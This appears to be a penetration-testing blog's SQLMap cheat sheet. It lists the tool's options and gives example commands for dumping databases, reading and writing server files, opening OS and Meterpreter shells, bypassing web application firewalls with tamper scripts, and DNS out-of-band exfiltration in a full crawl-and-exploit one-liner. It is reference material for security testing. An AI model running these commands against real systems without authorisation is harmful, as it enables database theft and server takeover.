What is SQLMap?

SQLMap is a SQL Injection automation tool that is finds and exploits SQL Injection vulnerabilities. SQLMap has a number of functionality that can assist from fingerprinting to fully compromising a database and/or in some cases gaining shell level access to a server. If you do not have a current understanding of the fundamentals of how a SQL injection vulnerability occurs or is exploited, see our documentation on what is SQL injection for an overview.

TIP: How To Use SQLMap

I personally use SQLMap as an exploitation tool, due to the large amount of resources and traffic the tool uses I personally find that detection is better done manually or using other detection tools such as Burp Suite scanner.

How to use SQLMap

SQLMap could be used within an automation system to detect and exploit SQL injection (SQLi) vulnerabilities in web applications, or as a SQLi exploitation tool to use after a proof of concept SQLi payload has been confirmed.

WARNING: SQLMap Usage

Depending on the configuration SQLMap can be very heavy on request sent to a web application, and may cause DoS conditions for webservers and cause an excessive amount of log files for the target.

The more information you can give SQLMap the faster and less requests the tool will make, for example if you know the backend DBMS is MySQL and it is vulnerable to time based injection, then this could be provided to SQLMap using --dbms=mysql and –technique=T.

How to Install SQLMap

Install SQLMap via github:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

How to Update SQLMap

How to update SQLMap:

python sqlmap.py --update 

or cd into the github repo director and do:

git pull 

SQLMap Commands

SQLMap Options

Basic SQLMap command options:

COMMAND DESCRIPTION

-h, --help

Show basic help message and exit

-hh

Show advanced help message and exit

--version

Show program's version number and exit

-v VERBOSE

Verbosity level: 0-6 (default 1)

SQLMap Target

SQLMap target command options:

COMMAND DESCRIPTION

-u URL, --url=URL

Target URL (e.g. "http://www.site.com/vuln.php?id=1")

-d DIRECT

Connection string for direct database connection

-l LOGFILE

Parse target(s) from Burp or WebScarab proxy log file

-m BULKFILE

Scan multiple targets given in a textual file

-r REQUESTFILE

Load HTTP request from a file

-g GOOGLEDORK

Process Google dork results as target URLs

-c CONFIGFILE

Load options from a configuration INI file

SQLMap Requests

SQLMap request command options:

COMMAND DESCRIPTION

-A AGENT, --user..

HTTP User-Agent header value

-H HEADER, --hea..

Extra header (e.g. "X-Forwarded-For: 127.0.0.1")

--method=METHOD

Force usage of given HTTP method (e.g. PUT)

--data=DATA

Data string to be sent through POST (e.g. "id=1")

--param-del=PARA..

Character used for splitting parameter values (e.g. &)

--cookie=COOKIE

HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")

--cookie-del=COO..

Character used for splitting cookie values (e.g. ;)

--live-cookies=L..

Live cookies file used for loading up-to-date values

--load-cookies=L..

File containing cookies in Netscape/wget format

--drop-set-cookie

Ignore Set-Cookie header from response

--mobile

Imitate smartphone through HTTP User-Agent header

--random-agent

Use randomly selected HTTP User-Agent header value

--host=HOST

HTTP Host header value

--referer=REFERER

HTTP Referer header value

--headers=HEADERS

Extra headers (e.g. "Accept-Language: fr\nETag: 123")

--auth-type=AUTH..

HTTP authentication type (Basic, Digest, NTLM or PKI)

--auth-cred=AUTH..

HTTP authentication credentials (name:password)

--auth-file=AUTH..

HTTP authentication PEM cert/private key file

--ignore-code=IG..

Ignore (problematic) HTTP error code (e.g. 401)

--ignore-proxy

Ignore system default proxy settings

--ignore-redirects

Ignore redirection attempts

--ignore-timeouts

Ignore connection timeouts

--proxy=PROXY

Use a proxy to connect to the target URL

--proxy-cred=PRO..

Proxy authentication credentials (name:password)

--proxy-file=PRO..

Load proxy list from a file

--proxy-freq=PRO..

Requests between change of proxy from a given list

--tor

Use Tor anonymity network

--tor-port=TORPORT

Set Tor proxy port other than default

--tor-type=TORTYPE

Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))

--check-tor

Check to see if Tor is used properly

--delay=DELAY

Delay in seconds between each HTTP request

--timeout=TIMEOUT

Seconds to wait before timeout connection (default 30)

--retries=RETRIES

Retries when the connection timeouts (default 3)

--randomize=RPARAM

Randomly change value for given parameter(s)

--safe-url=SAFEURL

URL address to visit frequently during testing

--safe-post=SAFE..

POST data to send to a safe URL

--safe-req=SAFER..

Load safe HTTP request from a file

--safe-freq=SAFE..

Regular requests between visits to a safe URL

--skip-urlencode

Skip URL encoding of payload data

--csrf-token=CSR..

Parameter used to hold anti-CSRF token

--csrf-url=CSRFURL

URL address to visit for extraction of anti-CSRF token

--csrf-method=CS..

HTTP method to use during anti-CSRF token page visit

--csrf-retries=C..

Retries for anti-CSRF token retrieval (default 0)

--force-ssl

Force usage of SSL/HTTPS

--chunked

Use HTTP chunked transfer encoded (POST) requests

--hpp

Use HTTP parameter pollution method

--eval=EVALCODE

Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

SQLMap Optimisation

SQLMap optimisation command options:

COMMAND DESCRIPTION

-o

Turn on all optimization switches

--predict-output

Predict common queries output

--keep-alive

Use persistent HTTP(s) connections

--null-connection

Retrieve page length without actual HTTP response body

--threads=THREADS

Max number of concurrent HTTP(s) requests (default 1)

SQLMap Injection

SQLMap injection command options:

COMMAND DESCRIPTION

-p TESTPARAMETER

Testable parameter(s)

--skip=SKIP

Skip testing for given parameter(s)

--skip-static

Skip testing parameters that not appear to be dynamic

--param-exclude=..

Regexp to exclude parameters from testing (e.g. "ses")

--param-filter=P..

Select testable parameter(s) by place (e.g. "POST")

--dbms=DBMS

Force back-end DBMS to provided value

--dbms-cred=DBMS..

DBMS authentication credentials (user:password)

--os=OS

Force back-end DBMS operating system to provided value

--invalid-bignum

Use big numbers for invalidating values

--invalid-logical

Use logical operations for invalidating values

--invalid-string

Use random strings for invalidating values

--no-cast

Turn off payload casting mechanism

--no-escape

Turn off string escaping mechanism

--prefix=PREFIX

Injection payload prefix string

--suffix=SUFFIX

Injection payload suffix string

--tamper=TAMPER

Use given script(s) for tampering injection data

SQLMap Detection

SQLMap detection command options:

COMMAND DESCRIPTION

--level=LEVEL

Level of tests to perform (1-5, default 1)

--risk=RISK

Risk of tests to perform (1-3, default 1)

--string=STRING

String to match when query is evaluated to True

--not-string=NOT..

String to match when query is evaluated to False

--regexp=REGEXP

Regexp to match when query is evaluated to True

--code=CODE

HTTP code to match when query is evaluated to True

--smart

Perform thorough tests only if positive heuristic(s)

--text-only

Compare pages based only on the textual content

--titles

Compare pages based only on their titles

SQLMap Techniques

SQLMap technique command options:

COMMAND DESCRIPTION

--technique=TECH..

SQL injection techniques to use (default "BEUSTQ")

--time-sec=TIMESEC

Seconds to delay the DBMS response (default 5)

--union-cols=UCOLS

Range of columns to test for UNION query SQL injection

--union-char=UCHAR

Character to use for bruteforcing number of columns

--union-from=UFROM

Table to use in FROM part of UNION query SQL injection

--dns-domain=DNS..

Domain name used for DNS exfiltration attack

--second-url=SEC..

Resulting page URL searched for second-order response

--second-req=SEC..

Load second-order HTTP request from file

SQLMap Fingerprinting

SQLMap fingerprint command options:

COMMAND DESCRIPTION

-f, --fingerprint

Perform an extensive DBMS version fingerprint

SQLMap Enumeration

SQLMap enumeration command options:

COMMAND DESCRIPTION

-a, --all

Retrieve everything

-b, --banner

Retrieve DBMS banner

--current-user

Retrieve DBMS current user

--current-db

Retrieve DBMS current database

--hostname

Retrieve DBMS server hostname

--is-dba

Detect if the DBMS current user is DBA

--users

Enumerate DBMS users

--passwords

Enumerate DBMS users password hashes

--privileges

Enumerate DBMS users privileges

--roles

Enumerate DBMS users roles

--dbs

Enumerate DBMS databases

--tables

Enumerate DBMS database tables

--columns

Enumerate DBMS database table columns

--schema

Enumerate DBMS schema

--count

Retrieve number of entries for table(s)

--dump

Dump DBMS database table entries

--dump-all

Dump all DBMS databases tables entries

--search

Search column(s), table(s) and/or database name(s)

--comments

Check for DBMS comments during enumeration

--statements

Retrieve SQL statements being run on DBMS

-D DB

DBMS database to enumerate

-T TBL

DBMS database table(s) to enumerate

-C COL

DBMS database table column(s) to enumerate

-X EXCLUDE

DBMS database identifier(s) to not enumerate

-U USER

DBMS user to enumerate

--exclude-sysdbs

Exclude DBMS system databases when enumerating tables

--pivot-column=P..

Pivot column name

--where=DUMPWHERE

Use WHERE condition while table dumping

--start=LIMITSTART

First dump table entry to retrieve

--stop=LIMITSTOP

Last dump table entry to retrieve

--first=FIRSTCHAR

First query output word character to retrieve

--last=LASTCHAR

Last query output word character to retrieve

--sql-query=SQLQ..

SQL statement to be executed

--sql-shell

Prompt for an interactive SQL shell

--sql-file=SQLFILE

Execute SQL statements from given file(s)

SQLMap Brute Force

SQLMap brute force command options:

COMMAND DESCRIPTION

--common-tables

Check existence of common tables

--common-columns

Check existence of common columns

--common-files

Check existence of common files

SQLMap Custom User Defined Options

SQLMap custom command options:

COMMAND DESCRIPTION

--udf-inject

Inject custom user-defined functions

--shared-lib=SHLIB

Local path of the shared library

SQLMap File System Options

SQLMap file system command options, e.g., how to read a file from the command line using SQLMap:

COMMAND DESCRIPTION

--file-read=FILE..

Read a file from the back-end DBMS file system

--file-write=FILE..

Write a local file on the back-end DBMS file system

--file-dest=FILE..

Back-end DBMS absolute filepath to write to

SQLMap Operating System Access

SQLMap OS command options, e.g., how to gain a shell via SQLMap:

COMMAND DESCRIPTION

--os-cmd=OSCMD

Execute an operating system command

--os-shell

Prompt for an interactive operating system shell

--os-pwn

Prompt for an OOB shell, Meterpreter or VNC

--os-smbrelay

One click prompt for an OOB shell, Meterpreter or VNC

--os-bof

Stored procedure buffer overflow exploitation

--priv-esc

Database process user privilege escalation

--msf-path=MSFPATH

Local path where Metasploit Framework is installed

--tmp-path=TMPPATH

Remote absolute path of temporary files directory

SQLMap Windows Registry Access

COMMAND DESCRIPTION

--reg-read

Read a Windows registry key value

--reg-add

Write a Windows registry key value data

--reg-del

Delete a Windows registry key value

--reg-key=REGKEY

Windows registry key

--reg-value=REGVAL

Windows registry key value

--reg-data=REGDATA

Windows registry key value data

--reg-type=REGTYPE

Windows registry key value type

General SQLMap Commands

SQLMap general command options:

COMMAND DESCRIPTION

-s SESSIONFILE

Load session from a stored (.sqlite) file

-t TRAFFICFILE

Log all HTTP traffic into a textual file

--answers=ANSWERS

Set predefined answers (e.g. "quit=N,follow=N")

--base64=BASE64PARAMS

Parameter(s) containing Base64 encoded data

--base64-safe

Use URL and filename safe Base64 alphabet (RFC 4648)

--batch

Never ask for user input, use the default behavior

--binary-fields=BINARYFIELDS

Result fields having binary values (e.g. "digest")

--check-internet

Check Internet connection before assessing the target

--cleanup

Clean up the DBMS from sqlmap specific UDF and tables

--crawl=CRAWLDEPTH

Crawl the website starting from the target URL

--crawl-exclude=CRAWLEXCLUDE

Regexp to exclude pages from crawling (e.g. "logout")

--csv-del=CSVDEL

Delimiting character used in CSV output (default ",")

--charset=CHARSET

Blind SQL injection charset (e.g. "0123456789abcdef")

--dump-format=DUMPFORMAT

Format of dumped data (CSV (default), HTML or SQLITE)

--encoding=ENCODING

Character encoding used for data retrieval (e.g. GBK)

--eta

Display for each output the estimated time of arrival

--flush-session

Flush session files for current target

--forms

Parse and test forms on target URL

--fresh-queries

Ignore query results stored in session file

--gpage=GOOGLEPAGE

Use Google dork results from specified page number

--har=HARFILE

Log all HTTP traffic into a HAR file

--hex

Use hex conversion during data retrieval

--output-dir=OUTPUTDIR

Custom output directory path

--parse-errors

Parse and display DBMS error messages from responses

--preprocess=PREPROCESS

Use given script(s) for preprocessing (request)

--postprocess=POSTPROCESS

Use given script(s) for postprocessing (response)

--repair

Redump entries having unknown character marker (?)

--save=SAVECONFIG

Save options to a configuration INI file

--scope=SCOPE

Regexp for filtering targets

--skip-heuristics

Skip heuristic detection of SQLi/XSS vulnerabilities

--skip-waf

Skip heuristic detection of WAF/IPS protection

--table-prefix=TABLEPREFIX

Prefix used for temporary tables (default: "sqlmap")

--test-filter=TESTFILTER

Select tests by payloads and/or titles (e.g. ROW)

--test-skip=TESTSKIP

Skip tests by payloads and/or titles (e.g. BENCHMARK)

--web-root=WEBROOT

Web server document root directory (e.g. "/var/www")

Misc SQLMap Commands

SQLMap commands that don’t fit into any other category :)

COMMAND DESCRIPTION

-z MNEMONICS

Use short mnemonics (e.g. "flu,bat,ban,tec=EU")

--alert=ALERT

Run host OS command(s) when SQL injection is found

--beep

Beep on question and/or when SQLi/XSS/FI is found

--dependencies

Check for missing (optional) sqlmap dependencies

--disable-coloring

Disable console output coloring

--list-tampers

Display list of available tamper scripts

--offline

Work in offline mode (only use session data)

--purge

Safely remove all content from sqlmap data directory

--results-file=RESULTSFILE

Location of CSV results file in multiple targets mode

--shell

Prompt for an interactive sqlmap shell

--tmp-dir=TMPDIR

Local directory for storing temporary files

--unstable

Adjust options for unstable connections

--update

Update sqlmap

--wizard

Simple wizard interface for beginner users

SQLMap Examples: How To…

Enumerate Databases

How to enumerate the databases tables using SQLMap:

sqlmap -u "https://highon.coffee" --dbs 

Enumerate Tables

How to enumerate the database tables using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" --tables 

SQLMap Dump DB Table

How to dump the contents of the table using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" -T "$table-name" --dump 

SQLMap from Burp file

Save a Burp or Zap request file and mark the injection point(s) parameters with an asterisk (*), the good thing about this option is that it takes care of any authentication cookies for you. You can inject into any parameter in the request, e.g., headers, inside cookies, and using multiple methods (GET, PUT, POST, DELETE) etc.

sqlmap -r request.burp 

Custom SQL Injection Payload: Pre and Post Input

In a scenario where you have identified a SQL injection manually or via another tool, you may need to suffix (have input entered before the SQL injection payload) or postfix (have input inserted after the injection payload), this can be accomplished using the following:

How to insert input before an injection payload:

sqlmap -u "https://highon.coffee" -dbs --suffix="blah"  

How to insert input after an injection payload:

sqlmap -u "https://highon.coffee" -dbs --postfix="--+"  
--cookie="PHPSESSID=$your-cookie"

SQLMap Shell

How to get an operating system command shell with SQLMap:

--os-shell 

How to execute a command with SQLMap:

--os-cmd uname 

Meterpreter Shell with SQLMap:

--os-pwn

SQLMap WAF Bypass

To bypass WAF’s with SQLMap you can use the premade tamper scripts with --tamper like in the following example:

sqlmap -u “https://highon.coffee/?espresso=*--tamper="apostrophemask,apostrophenullencode,randomcase"

Tamper Scripts Send a LOT of Requests

Tamper scripts will resend the same request for each of the SQLMap WAF bypass scripts that you add.

List of SQLMap Tamper Scripts:

Tamper Description    
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart    
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart    
appendnullbyte.py Appends encoded NULL byte character at the end of payload    
base64encode.py Base64 all characters in a given payload    
between.py Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’    
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator    
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded)    
commalesslimit.py Replaces instances like ‘LIMIT M, N’ with ‘LIMIT N OFFSET M’    
commalessmid.py Replaces instances like ‘MID(A, B, C)’ with ‘MID(A FROM B FOR C)’    
concat2concatws.py Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’    
charencode.py Url-encodes all characters in a given payload (not processing already encoded)    
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)    
equaltolike.py Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’    
escapequotes.py Slash escape quotes (‘ and “)    
greatest.py Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart    
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword    
ifnull2ifisnull.py Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’    
modsecurityversioned.py Embraces complete query with versioned comment    
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment    
multiplespaces.py Adds multiple spaces around SQL keywords    
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters    
percentage.py Adds a percentage sign (‘%’) infront of each character    
overlongutf8.py Converts all characters in a given payload (not processing already encoded)    
randomcase.py Replaces each keyword character with random case value    
randomcomments.py Add random comments to SQL keywords    
securesphere.py Appends special crafted string    
sp_password.py Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs    
space2comment.py Replaces space character (‘ ‘) with comments    
space2dash.py Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a random string and a new line (‘\n’)    
space2hash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)    
space2morehash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)    
space2mssqlblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
space2mssqlhash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a new line (‘\n’)    
space2mysqlblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
space2mysqldash.py Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a new line (‘\n’)    
space2plus.py Replaces space character (‘ ‘) with plus (‘+’)    
space2randomblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and   )
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT    
unmagicquotes.py Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)    
uppercase.py Replaces each keyword character with upper case value ‘INSERT’    
varnish.py Append a HTTP header ‘X-originating-IP’    
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment    
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment    
xforwardedfor.py Append a fake HTTP header ‘X-Forwarded-For’    

SQLMap Proxy

It is possible to proxy SQLMap traffic via an upstream proxy such as Burp Suite by passing the following syntax to the tool:

sqlmap --proxy=http://127.0.0.1:8080 

Burp Proxy Performance Hit

In my experience using Burp Suite as a Proxy for this process results in a considerable slow down in performance.

SQLMap Blind SQLi Out of Band (OOB)

sqlmap -u “https://highon.coffee/?espresso=*--dns-domain=$your-collab-url

SQLMap GET Parameter

The following specifies the GET parameter “espresso” for injection:

sqlmap -u “https://highon.coffee/?espresso=*-p espresso 

SQLMap POST Parameter

The following specifies the POST parameter “espresso” for injection:

sqlmap -u “https://highon.coffee/?espresso=*--data “espresso=*

Run SQL Queries

You can run a SQL query using –sql-query for example:

sqlmap -u highon.coffee -D $database-name --sql-query="SELECT * FROM $table;"

URL Parameters in Friendly URL’s

Simply mark them with an asterisk(*), for example:

https://highon.coffee/foo/bar/parameter1*/value1 

The above would set the injection point at parameter1.

SQLMap Crawl & Exploit

Useful for automation, however please be mindful of the overheads you are imposing on the target server:

python3 sqlmap.py --crawl=5 --threads=5 --risk=3 --level=5 --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N" --crawl-exclude="logout" --forms --tamper=apostrophemask,apostrophenullencode,randomcase --dns-domain=$your-collab-url --random-agent -u https://highon.coffee

You will need to replace your collaborator payloads URL, and I highly recommend you setup your own collaborator server for this.

If you found this SQLMap cheat sheet useful, please share it below.

Document Changelog

  • Last Updated: 12/02/2024 (12th of February 2024)
  • Author: Arr0way
  • Notes: SQLMap cheat sheet created.